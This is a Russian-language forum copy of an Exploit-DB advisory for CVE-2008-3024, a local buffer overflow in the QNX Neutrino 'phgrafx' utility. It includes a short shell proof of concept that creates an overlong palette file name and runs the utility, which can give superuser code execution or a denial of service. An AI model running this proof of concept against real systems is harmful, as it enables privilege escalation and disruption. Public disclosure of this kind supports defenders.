- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 32009
- Проверка EDB
-
- Пройдено
- Автор
- FILIPE BALESTRA
- Тип уязвимости
- DOS
- Платформа
- UNIX
- CVE
- cve-2008-3024
- Дата публикации
- 2008-07-01
Код:
source: https://www.securityfocus.com/bid/30024/info
QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.
Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.
QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx- Источник
- www.exploit-db.com
